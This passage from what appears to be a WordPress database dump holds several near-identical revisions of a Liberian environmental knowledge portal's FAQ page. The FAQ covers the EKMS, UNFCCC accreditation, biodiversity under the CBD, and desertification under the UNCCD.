data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.\n\n<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n\nNo, each participant must be properly accredited and registered.\n\n<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n\nThere are different participation groups at UNFCCC meetings; these include:\n<ol>\n 	<li><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the&nbsp;<a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</li>\n 	<li><strong>Observers</strong>&nbsp;from admitted&nbsp;<a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a>&nbsp;or&nbsp;<a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a>&nbsp;organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the&nbsp;<a href=\"https://onlinereg.unfccc.int/\">online registration system</a>&nbsp;(ORS). Please see the&nbsp;<a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a>&nbsp;web page for more information.</li>\n 	<li><strong>Observer</strong>&nbsp;from a United Nations organization or specialized agency. Nominations are received from the respective organization.</li>\n 	<li><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the&nbsp;<a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</li>\n</ol>\n<a href=\"\">What is the purpose of the UNFCCC?</a>\n\nThe&nbsp;UN Framework Convention on Climate Change&nbsp;(UNFCCC) is an intergovernmental treaty developed to address the problem of&nbsp;climate change.\n\n<a href=\"\">What is climate neutrality?</a>\n\nClimate neutrality is achieved by balancing the amount of emissions generated with the Earth’s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.\n<h2>UNCBD</h2>\n<a href=\"\">What is the UNCBD?</a>\n\nThe&nbsp;Convention on Biological Diversity&nbsp;(CBD)&nbsp;is&nbsp;an international legally-binding treaty with three main goals: conservation of&nbsp;biodiversity; sustainable use of&nbsp;biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.\n\n<a href=\"\">What is conservation of biodiversity?</a>\n\nConservation of biological diversity&nbsp;leads to&nbsp;conservation&nbsp;of essential ecological&nbsp;diversity&nbsp;to preserve the continuity of food chains. The genetic&nbsp;diversity&nbsp;of plants and animals is preserved. Biodiversity conservation&nbsp;serves as an insurance policy for the future.\n\n<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n\nBiodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.\n\n<a href=\"\">How can we protect and preserve biodiversity?</a>\n\nSupport the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and&nbsp;protect&nbsp;beaches, parks, reserves, and fields where wild plants and animals live.\n\n<a href=\"\">What are some factors that affect biodiversity?</a>\n\nThe loss of&nbsp;biodiversity affects the lives of more than 1 billion people living in dry lands.\n5 major threats to biodiversity;\nClimate change\nDeforestation and habitat loss\nOver-exploitation\nInvasive species\nPollution\n<h2>UNCCD</h2>\n<a href=\"\">What is the importance of the UNCCD?</a>\n\nThe&nbsp;United Nations Convention to Combat Desertification&nbsp;in Those&nbsp;Countries&nbsp;Experiencing Serious Drought and/or&nbsp;Desertification, Particularly in Africa (UNCCD) is a&nbsp;Convention to combat desertification&nbsp;and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by&nbsp;international cooperation and partnership arrangements.\n\n<a href=\"\">Is the UNCCD legally binding?</a>\n\nEstablished in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management\n\n<a href=\"\">What is desertification?</a>\n\nDesertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.\n\n<a href=\"\">Why is it important to combat desertification?</a>\n\nDesertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land’s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined – are at risk of being displaced as a consequence of desertification.\n\n<a href=\"\">Is desertification a global problem?</a>\n\nDesertification is a worldwide problem directly affecting 250 million people and a third of the earth’s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world’s poorest in over one hundred countries are threatened.','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:34:50','2019-11-16 19:34:50','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2520,1,'2019-11-16 19:34:50','2019-11-16 19:34:50','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implementation in Liberia.</p>\n												<a href=\"\">How many institutions are involved?</a>\n					<p>There are 12 national institutions involved;<br />Forest Development Authority (FDA)<br />Ministry of Agriculture (MOA)<br />Central Agriculture Research Institute (CIRA)<br />Liberia Land Authority (LLA)<br />National Fisheries and Aquaculture Authority (NFAA)<br />Liberia Maritime Authority (LMA)<br />Ministry of Mines and Energy (MME)<br />Ministry of Public Works (MoPW)<br />Ministry of Internal Affairs (MIA)<br />Liberia Bureau of Concessions<br />Ministry of Gender<br />Liberia Institute of Statistics and Geo-Information Services (LISGIS)</p>\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:34:50','2019-11-16 19:34:50','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2522,1,'2019-11-16 19:43:49','2019-11-16 19:43:49','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implementation in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:43:49','2019-11-16 19:43:49','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2523,1,'2019-11-16 19:48:08','2019-11-16 19:48:08','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implementation in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discussion on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own Facebook groups, on Twitter, or Linkedin.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-16 19:48:08','2019-11-16 19:48:08','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2524,1,'2019-11-16 19:48:27','2019-11-16 19:48:27','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implementation in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discussion on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own Facebook groups, on Twitter, or Linkedin. Thank you.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living 